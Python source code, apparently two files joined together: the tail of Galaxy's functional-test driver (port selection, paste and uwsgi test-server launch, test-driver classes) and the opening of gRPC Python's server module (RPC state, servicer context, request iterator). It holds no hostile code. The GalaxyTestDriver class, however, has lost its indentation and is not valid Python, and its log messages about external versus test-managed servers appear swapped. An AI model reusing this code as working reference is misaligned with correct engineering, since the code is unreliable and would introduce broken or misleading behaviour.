    }
def get_webapp_global_conf():
    """Get the global_conf dictionary sent to ``app_factory``."""
    # (was originally sent 'dict()') - nothing here for now except static settings
    return dict(_get_static_settings())
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
    """Wait for an HTTP server to boot up.

    Polls ``GET /`` on ``host:port`` up to ``sleep_tries`` times, sleeping
    ``sleep_amount`` seconds between attempts, and raises an Exception if the
    server never answers with a 200.
    """
    # Test if the server is up
    for _ in range(sleep_tries):
        # directly test the app, not the proxy
        conn = http_client.HTTPConnection(host, port)
        try:
            conn.request("GET", "/")
            response = conn.getresponse()
            if response.status == 200:
                break
        except OSError as e:
            # 61 (macOS) / 111 (Linux) are ECONNREFUSED - server not up yet.
            if e.errno not in [61, 111]:
                raise
        time.sleep(sleep_amount)
    else:
        # Fixed: the message previously always claimed "10 tries" regardless
        # of the configured sleep_tries.
        template = "Test HTTP server on host %s and port %s did not return '200 OK' after %d tries"
        message = template % (host, port, sleep_tries)
        raise Exception(message)
def attempt_ports(port):
    """Yield candidate ports for the test server to bind.

    With an explicit ``port``, yield it exactly once - being asked for
    another value means the bind failed, so raise. Otherwise yield up to
    nine random ports in [8000, 10000] before giving up.
    """
    if port is not None:
        yield port
        raise Exception("An existing process seems bound to specified test server port [%s]" % port)
    random.seed()
    for _attempt in range(9):
        yield str(random.randint(8000, 10000))
    raise Exception("Unable to open a port between {} and {} to start Galaxy server".format(8000, 10000))
def serve_webapp(webapp, port=None, host=None):
    """Serve the webapp on a recommend port or a free one.

    Return the port the webapp is running on.
    """
    server = None
    for port in attempt_ports(port):
        try:
            # paste httpserver with start_loop=False so we drive the loop
            # from our own thread below.
            server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
            break
        except OSError as e:
            if e.errno == 98:
                # EADDRINUSE - try the next candidate port.
                continue
            raise
    # Serve requests in a background thread; caller is responsible for
    # shutting the server down (see PasteServerWrapper.stop).
    t = threading.Thread(target=server.serve_forever)
    t.start()
    return server, port
def cleanup_directory(tempdir):
    """Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.

    Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
    """
    skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
    if skip_cleanup:
        log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
        return
    try:
        # Removed redundant re-check of skip_cleanup - we already returned above.
        if os.path.exists(tempdir):
            shutil.rmtree(tempdir)
    except Exception:
        # Best-effort cleanup; never fail a test run over leftover temp files.
        pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
    """Modify Galaxy app's toolbox for migrated or installed tool tests.

    NOTE: testing_migrated_tools is accepted but unused in this body -
    only the installed-tools path mutates the app.
    """
    if testing_installed_tools:
        # TODO: Do this without modifying app - that is a pretty violation
        # of Galaxy's abstraction - we shouldn't require app at all let alone
        # be modifying it.
        tool_configs = app.config.tool_configs
        # Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
        # and reload the app's toolbox.
        relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
        if relative_migrated_tool_panel_config in tool_configs:
            tool_configs.remove(relative_migrated_tool_panel_config)
        for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
            tool_configs.append(installed_tool_panel_config)
        from galaxy import tools  # delay import because this brings in so many modules for small tests # noqa: E402
        app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary and use load_app_properties so
    Galaxy override variables are respected. Also setup "global" references
    to sqlalchemy database context for Galaxy and install databases.
    """
    log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
    simple_kwargs['global_conf'] = get_webapp_global_conf()
    simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
    simple_kwargs = load_app_properties(
        kwds=simple_kwargs
    )
    # Build the Universe Application
    app = GalaxyUniverseApplication(**simple_kwargs)
    log.info("Embedded Galaxy application started")
    # Expose the sqlalchemy contexts at module level for legacy twill tests.
    global galaxy_context
    global install_context
    galaxy_context = app.model.context
    install_context = app.install_model.context
    # Toolbox indexing happens via the work queue out of band recently, and,
    # beyond potentially running async after tests execute doesn't execute
    # without building a uwsgi app (app.is_webapp = False for this test kit).
    # We need to ensure to build an index for the test galaxy app -- this is
    # pretty fast with the limited toolset
    app.reindex_tool_search()
    return app
def build_shed_app(simple_kwargs):
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary. Also setup "global" reference
    to sqlalchemy database context for tool shed database.
    """
    log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
    # TODO: Simplify global_conf to match Galaxy above...
    simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
    simple_kwargs['global_conf'] = get_webapp_global_conf()
    app = ToolshedUniverseApplication(**simple_kwargs)
    log.info("Embedded Toolshed application started")
    # Expose the sqlalchemy context at module level for legacy twill tests.
    global tool_shed_context
    tool_shed_context = app.model.context
    return app
def explicitly_configured_host_and_port(prefix, config_object):
    """Resolve the test server host/port from <PREFIX>_TEST_HOST/_TEST_PORT.

    Returns ``(host, port)`` where ``port`` is None when a random port should
    be chosen; in that case the prefix-specific *_TEST_PORT_RANDOM variable
    is set so subsequent calls know the port may be re-randomized.
    """
    host_env_key = "%s_TEST_HOST" % prefix
    port_env_key = "%s_TEST_PORT" % prefix
    port_random_env_key = "%s_TEST_PORT_RANDOM" % prefix
    default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
    host = os.environ.get(host_env_key, default_web_host)

    if os.environ.get(port_random_env_key, None) is not None:
        # Ignore the port environment variable, it wasn't explicitly configured.
        port = None
    else:
        port = os.environ.get(port_env_key, None)

    # If an explicit port wasn't assigned for this test or test case, set this
    # environment variable so we know it is random. We can then randomly re-assign
    # for new tests.
    if port is None:
        # Fixed: previously this always set GALAXY_TEST_PORT_RANDOM, even for
        # other prefixes (e.g. TOOL_SHED), so the prefix-specific check above
        # never saw the marker.
        os.environ[port_random_env_key] = "1"
    return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
    """Export <PREFIX>_TEST_HOST/_TEST_PORT then block until the server answers."""
    host_env_key = "%s_TEST_HOST" % prefix
    port_env_key = "%s_TEST_PORT" % prefix
    os.environ[host_env_key] = host
    os.environ[port_env_key] = port
    wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
    """Base class tracking a running test server's name, host and port.

    Subclasses provide access to the underlying app (when embedded) and a
    way to stop the server.
    """

    def __init__(self, name, host, port):
        self.name, self.host, self.port = name, host, port

    @property
    def app(self):
        raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")

    def stop(self):
        raise NotImplementedError()
class PasteServerWrapper(ServerWrapper):
    """ServerWrapper for an embedded paste web server and its Galaxy app."""

    def __init__(self, app, server, name, host, port):
        super().__init__(name, host, port)
        self._app = app
        self._server = server

    @property
    def app(self):
        return self._app

    def stop(self):
        server, app = self._server, self._app
        if server is not None:
            log.info("Shutting down embedded %s web server" % self.name)
            server.server_close()
            log.info("Embedded web server %s stopped" % self.name)
        if app is not None:
            log.info("Stopping application %s" % self.name)
            app.shutdown()
            log.info("Application %s stopped." % self.name)
class UwsgiServerWrapper(ServerWrapper):
    """ServerWrapper for a uwsgi subprocess running a test server."""

    def __init__(self, p, name, host, port):
        super().__init__(name, host, port)
        # Popen handle for the uwsgi master process.
        self._p = p
        # Exit code once wait() completes.
        self._r = None
        # Reap the subprocess in the background so it never zombifies.
        self._t = threading.Thread(target=self.wait)
        self._t.start()

    def __del__(self):
        self._t.join()

    def wait(self):
        self._r = self._p.wait()

    def stop(self):
        try:
            # Signal the whole process group (uwsgi master + workers).
            os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
        except Exception:
            pass
        time.sleep(.1)
        try:
            # Escalate to SIGKILL if anything is still alive.
            os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
        except Exception:
            pass
        self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Write a galaxy.yml from ``kwargs`` and launch a uwsgi test server.

    Returns a UwsgiServerWrapper once the server answers HTTP; tries
    successive ports via attempt_ports(), stopping failed attempts.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    config = {}
    config["galaxy"] = kwargs.copy()
    enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
    if enable_realtime_mapping:
        # Fill in interactive-tool options unless the caller already set them.
        interactive_tool_defaults = {
            "interactivetools_prefix": "interactivetool",
            "interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
            "interactivetools_enable": True
        }
        for key, value in interactive_tool_defaults.items():
            if key not in config["galaxy"]:
                config["galaxy"][key] = value
    yaml_config_path = os.path.join(tempdir, "galaxy.yml")
    with open(yaml_config_path, "w") as f:
        yaml.dump(config, f)
    if enable_realtime_mapping:
        # Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
        # though maybe it would work?
        with open(yaml_config_path) as f:
            old_contents = f.read()
        with open(yaml_config_path, "w") as f:
            test_port = str(port) if port else r"[0-9]+"
            test_host = re.escape(host) if host else "localhost"
            uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
            f.write(uwsgi_section)
            f.write(old_contents)

    def attempt_port_bind(port):
        # Spawn uwsgi bound to host:port running Galaxy's uwsgi app factory.
        uwsgi_command = [
            "uwsgi",
            "--http",
            "{}:{}".format(host, port),
            "--yaml",
            yaml_config_path,
            "--module",
            "galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
            "--enable-threads",
            "--die-on-term",
        ]
        # Propagate the current sys.path into the uwsgi interpreter.
        for p in sys.path:
            uwsgi_command.append('--pythonpath')
            uwsgi_command.append(p)
        handle_uwsgi_cli_command = getattr(
            config_object, "handle_uwsgi_cli_command", None
        )
        if handle_uwsgi_cli_command is not None:
            handle_uwsgi_cli_command(uwsgi_command)
        # we don't want to quote every argument but we don't want to print unquoted ones either, so do this
        log.info("Starting uwsgi with command line: %s", ' '.join(shlex_quote(x) for x in uwsgi_command))
        p = subprocess.Popen(
            uwsgi_command,
            cwd=galaxy_root,
            preexec_fn=os.setsid,
        )
        return UwsgiServerWrapper(
            p, name, host, port
        )

    for port in attempt_ports(port):
        server_wrapper = attempt_port_bind(port)
        try:
            set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
            log.info("Test-managed uwsgi web server for {} started at {}:{}".format(name, host, port))
            return server_wrapper
        except Exception:
            # Bind/startup failed - kill this attempt and try the next port.
            server_wrapper.stop()
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Launch a web server for a given app using supplied factory.

    Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
    TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
    all set after this method has been called.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    webapp = webapp_factory(
        kwargs['global_conf'],
        app=app,
        use_translogger=False,
        static_enabled=True,
        register_shutdown_at_exit=False
    )
    # serve_webapp may pick a different (free) port than requested.
    server, port = serve_webapp(
        webapp,
        host=host, port=port
    )
    set_and_wait_for_http_target(prefix, host, port)
    log.info("Embedded paste web server for {} started at {}:{}".format(name, host, port))
    return PasteServerWrapper(
        app, server, name, host, port
    )
class TestDriver:
    """Responsible for the life-cycle of a Galaxy-style functional test.

    Sets up servers, configures tests, runs nose, and tears things
    down. This is somewhat like a Python TestCase - but different
    because it is meant to provide a main() endpoint.
    """

    def __init__(self):
        """Setup tracked resources."""
        self.server_wrappers = []
        self.temp_directories = []

    def setup(self):
        """Called before tests are built."""

    def build_tests(self):
        """After environment is setup, setup nose tests."""

    def tear_down(self):
        """Cleanup resources tracked by this object."""
        self.stop_servers()
        for directory in self.temp_directories:
            cleanup_directory(directory)

    def stop_servers(self):
        for wrapper in self.server_wrappers:
            wrapper.stop()
        self.server_wrappers = []

    def mkdtemp(self):
        """Return a temp directory that is properly cleaned up or not based on the config."""
        path = tempfile.mkdtemp()
        self.temp_directories.append(path)
        return path

    def run(self):
        """Driver whole test.

        Setup environment, build tests (if needed), run test,
        and finally cleanup resources.
        """
        configure_environment()
        self.setup()
        self.build_tests()
        try:
            return 0 if nose_config_and_run() else 1
        except Exception as e:
            log.info("Failure running tests")
            raise e
        finally:
            log.info("Shutting down")
            self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = os.environ.get('GALAXY_TEST_UWSGI', None)
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if callable(galaxy_config):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False)
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info("Functional tests will be run against external Galaxy server {}:{}".format(server_wrapper.host, server_wrapper.port))
self.server_wrappers.append(server_wrapper)
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
    def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
        """Run a single tool test case against the target Galaxy server.

        tool_id -- id of the tool whose test should be run
        index -- which of the tool's defined tests to run (default: the first)
        resource_parameters -- job resource parameters to submit with the run
        Remaining keyword arguments are forwarded to ``verify_tool``.
        """
        if resource_parameters is None:
            resource_parameters = {}
        host, port, url = target_url_parts()
        galaxy_interactor_kwds = {
            "galaxy_url": url,
            "master_api_key": get_master_api_key(),
            "api_key": get_user_api_key(),
            # None: test outputs are not persisted to disk.
            "keep_outputs_dir": None,
        }
        galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
        verify_tool(
            tool_id=tool_id,
            test_index=index,
            galaxy_interactor=galaxy_interactor,
            resource_parameters=resource_parameters,
            **kwd
        )
def drive_test(test_driver_class):
    """Instantiate driver class, run, and exit appropriately."""
    sys.exit(test_driver_class().run())
# Public API of this module: the names test runners are expected to import.
__all__ = (
    "copy_database_template",
    "build_logger",
    "drive_test",
    "FRAMEWORK_UPLOAD_TOOL_CONF",
    "FRAMEWORK_SAMPLE_TOOLS_CONF",
    "FRAMEWORK_DATATYPES_CONF",
    "database_conf",
    "get_webapp_global_conf",
    "nose_config_and_run",
    "setup_galaxy_config",
    "TestDriver",
    "wait_for_http_server",
)
|
_server.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
from concurrent import futures
import six
import grpc
from grpc import _common
from grpc import _interceptor
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)

# Completion-queue tags for server-level events.
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'

# Tokens tracked in _RPCState.due to account for outstanding batch operations.
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
    'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
    'send_initial_metadata * send_status_from_server')

# States of the client side of the stream as observed by the server.
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'

_EMPTY_FLAGS = 0

# How often the serving thread wakes up to check the server_deallocated flag.
_DEALLOCATED_SERVER_CHECK_PERIOD_S = 1.0
def _serialized_request(request_event):
    """Extract the raw request bytes from a receive-message batch event."""
    receive_operation = request_event.batch_operations[0]
    return receive_operation.message()
def _application_code(code):
    """Map a grpc.StatusCode to its cygrpc equivalent, defaulting to unknown."""
    mapped = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
    if mapped is None:
        return cygrpc.StatusCode.unknown
    return mapped
def _completion_code(state):
    """Status code to complete with: OK unless the application set one."""
    if state.code is None:
        return cygrpc.StatusCode.ok
    return _application_code(state.code)
def _abortion_code(state, code):
    """Abortion status code: an application-set code wins over the internal one."""
    return code if state.code is None else _application_code(state.code)
def _details(state):
    """Status details bytes; empty when the application set none."""
    if state.details is None:
        return b''
    return state.details
class _HandlerCallDetails(
        collections.namedtuple('_HandlerCallDetails', (
            'method',
            'invocation_metadata',
        )), grpc.HandlerCallDetails):
    """Concrete grpc.HandlerCallDetails handed to generic handlers/interceptors."""
    pass
class _RPCState(object):
    """Mutable per-RPC state shared between the driver thread and handler threads.

    All fields must be read and written while holding ``condition``.
    """

    def __init__(self):
        self.condition = threading.Condition()
        # Tokens of batch operations started but not yet completed.
        self.due = set()
        self.request = None
        # One of _OPEN, _CLOSED, _CANCELLED: the client stream's state.
        self.client = _OPEN
        self.initial_metadata_allowed = True
        self.disable_next_compression = False
        self.trailing_metadata = None
        self.code = None
        self.details = None
        # True once a terminating status has been (or is being) sent.
        self.statused = False
        # RpcErrors this module raised into application code; used to avoid
        # double-aborting when they propagate back out of the handler.
        self.rpc_errors = []
        # Termination callbacks; set to None once drained at termination.
        self.callbacks = []
        self.aborted = False
def _raise_rpc_error(state):
    """Record a fresh RpcError on the RPC state, then raise it."""
    error = grpc.RpcError()
    state.rpc_errors.append(error)
    raise error
def _possibly_finish_call(state, token):
    """Retire *token*; return (state, callbacks) if the RPC fully terminated.

    Must be called under ``state.condition``. When the RPC is inactive and no
    batch operations remain due, the termination callbacks are drained
    (state.callbacks becomes None) and returned for invocation by the caller;
    otherwise (None, ()) is returned.
    """
    state.due.remove(token)
    if not _is_rpc_state_active(state) and not state.due:
        callbacks = state.callbacks
        state.callbacks = None
        return state, callbacks
    else:
        return None, ()
def _send_status_from_server(state, token):
    """Build the completion callback for a send-status batch operation."""

    def send_status_from_server(unused_send_status_from_server_event):
        with state.condition:
            return _possibly_finish_call(state, token)

    return send_status_from_server
def _abort(state, call, code, details):
    """Send a terminating status to the client (unless already cancelled).

    Must be called under ``state.condition``. Application-supplied code and
    details stored on *state* take precedence over the passed-in values.
    Initial metadata is bundled into the same batch when it has not yet been
    sent.
    """
    if state.client is not _CANCELLED:
        effective_code = _abortion_code(state, code)
        effective_details = details if state.details is None else state.details
        if state.initial_metadata_allowed:
            operations = (
                cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
                cygrpc.SendStatusFromServerOperation(
                    state.trailing_metadata, effective_code, effective_details,
                    _EMPTY_FLAGS),
            )
            token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
        else:
            operations = (cygrpc.SendStatusFromServerOperation(
                state.trailing_metadata, effective_code, effective_details,
                _EMPTY_FLAGS),)
            token = _SEND_STATUS_FROM_SERVER_TOKEN
        call.start_server_batch(operations,
                                _send_status_from_server(state, token))
        state.statused = True
        state.due.add(token)
def _receive_close_on_server(state):
    """Build the callback recording client cancellation or half-close."""

    def receive_close_on_server(receive_close_on_server_event):
        with state.condition:
            if receive_close_on_server_event.batch_operations[0].cancelled():
                state.client = _CANCELLED
            elif state.client is _OPEN:
                state.client = _CLOSED
            # Wake any handler thread blocked waiting for client activity.
            state.condition.notify_all()
            return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)

    return receive_close_on_server
def _receive_message(state, call, request_deserializer):
    """Build the callback handling a received (possibly absent) request message.

    A None serialized request means the client half-closed; a message that
    fails deserialization aborts the RPC with INTERNAL.
    """

    def receive_message(receive_message_event):
        serialized_request = _serialized_request(receive_message_event)
        if serialized_request is None:
            with state.condition:
                if state.client is _OPEN:
                    state.client = _CLOSED
                state.condition.notify_all()
                return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
        else:
            request = _common.deserialize(serialized_request,
                                          request_deserializer)
            with state.condition:
                if request is None:
                    _abort(state, call, cygrpc.StatusCode.internal,
                           b'Exception deserializing request!')
                else:
                    state.request = request
                state.condition.notify_all()
                return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)

    return receive_message
def _send_initial_metadata(state):
    """Build the completion callback for a send-initial-metadata batch."""

    def send_initial_metadata(unused_send_initial_metadata_event):
        with state.condition:
            return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)

    return send_initial_metadata
def _send_message(state, token):
    """Build the completion callback for a send-message batch; wakes waiters."""

    def send_message(unused_send_message_event):
        with state.condition:
            # _send_response blocks until its token leaves state.due.
            state.condition.notify_all()
            return _possibly_finish_call(state, token)

    return send_message
class _Context(grpc.ServicerContext):
    """Concrete ServicerContext backed by a cygrpc call and an _RPCState.

    All mutations of the shared _RPCState are performed while holding
    ``state.condition``, which serializes access against the completion-queue
    driver thread.
    """

    def __init__(self, rpc_event, state, request_deserializer):
        self._rpc_event = rpc_event
        self._state = state
        self._request_deserializer = request_deserializer

    def is_active(self):
        """True while the RPC has been neither cancelled nor statused."""
        with self._state.condition:
            return _is_rpc_state_active(self._state)

    def time_remaining(self):
        """Seconds until the call's deadline, never negative."""
        return max(self._rpc_event.call_details.deadline - time.time(), 0)

    def cancel(self):
        self._rpc_event.call.cancel()

    def add_callback(self, callback):
        """Register a termination callback; False if the RPC already terminated."""
        with self._state.condition:
            if self._state.callbacks is None:
                # Callbacks were already drained at RPC termination.
                return False
            else:
                self._state.callbacks.append(callback)
                return True

    def disable_next_message_compression(self):
        with self._state.condition:
            self._state.disable_next_compression = True

    def invocation_metadata(self):
        return self._rpc_event.invocation_metadata

    def peer(self):
        return _common.decode(self._rpc_event.call.peer())

    def peer_identities(self):
        return cygrpc.peer_identities(self._rpc_event.call)

    def peer_identity_key(self):
        id_key = cygrpc.peer_identity_key(self._rpc_event.call)
        return id_key if id_key is None else _common.decode(id_key)

    def auth_context(self):
        return {
            _common.decode(key): value
            for key, value in six.iteritems(
                cygrpc.auth_context(self._rpc_event.call))
        }

    def send_initial_metadata(self, initial_metadata):
        """Start an initial-metadata batch; ValueError if it was already sent."""
        with self._state.condition:
            if self._state.client is _CANCELLED:
                _raise_rpc_error(self._state)
            else:
                if self._state.initial_metadata_allowed:
                    operation = cygrpc.SendInitialMetadataOperation(
                        initial_metadata, _EMPTY_FLAGS)
                    self._rpc_event.call.start_server_batch(
                        (operation,), _send_initial_metadata(self._state))
                    self._state.initial_metadata_allowed = False
                    self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
                else:
                    raise ValueError('Initial metadata no longer allowed!')

    def set_trailing_metadata(self, trailing_metadata):
        with self._state.condition:
            self._state.trailing_metadata = trailing_metadata

    def abort(self, code, details):
        # treat OK like other invalid arguments: fail the RPC
        if code == grpc.StatusCode.OK:
            _LOGGER.error(
                'abort() called with StatusCode.OK; returning UNKNOWN')
            code = grpc.StatusCode.UNKNOWN
            details = ''
        with self._state.condition:
            self._state.code = code
            self._state.details = _common.encode(details)
            self._state.aborted = True
        # Deliberately a bare Exception: _call_behavior detects the aborted
        # flag and converts this into the configured status.
        raise Exception()

    def abort_with_status(self, status):
        # FIX: guard this shared-state write with the RPC condition, matching
        # every other _RPCState mutation in this class (see
        # set_trailing_metadata above); previously the unlocked write raced
        # with the completion-queue driver thread. threading.Condition's
        # default lock is an RLock, so abort() below may safely re-enter it.
        with self._state.condition:
            self._state.trailing_metadata = status.trailing_metadata
        self.abort(status.code, status.details)

    def set_code(self, code):
        with self._state.condition:
            self._state.code = code

    def set_details(self, details):
        with self._state.condition:
            self._state.details = _common.encode(details)

    def _finalize_state(self):
        # Nothing to clean up for the non-experimental context.
        pass
class _RequestIterator(object):
    """Blocking iterator over a request-streaming RPC's incoming messages.

    Each iteration starts one receive-message batch and waits on the RPC
    condition until the message arrives, the stream closes (StopIteration),
    or the RPC fails (RpcError).
    """

    def __init__(self, state, call, request_deserializer):
        self._state = state
        self._call = call
        self._request_deserializer = request_deserializer

    def _raise_or_start_receive_message(self):
        # Called under self._state.condition.
        if self._state.client is _CANCELLED:
            _raise_rpc_error(self._state)
        elif not _is_rpc_state_active(self._state):
            raise StopIteration()
        else:
            self._call.start_server_batch(
                (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
                _receive_message(self._state, self._call,
                                 self._request_deserializer))
            self._state.due.add(_RECEIVE_MESSAGE_TOKEN)

    def _look_for_request(self):
        # Called under self._state.condition; returns None while the receive
        # batch is still outstanding.
        if self._state.client is _CANCELLED:
            _raise_rpc_error(self._state)
        elif (self._state.request is None and
              _RECEIVE_MESSAGE_TOKEN not in self._state.due):
            raise StopIteration()
        else:
            request = self._state.request
            self._state.request = None
            return request

        raise AssertionError()  # should never run

    def _next(self):
        with self._state.condition:
            self._raise_or_start_receive_message()
            while True:
                # Woken by _receive_message / _receive_close_on_server callbacks.
                self._state.condition.wait()
                request = self._look_for_request()
                if request is not None:
                    return request

    def __iter__(self):
        return self

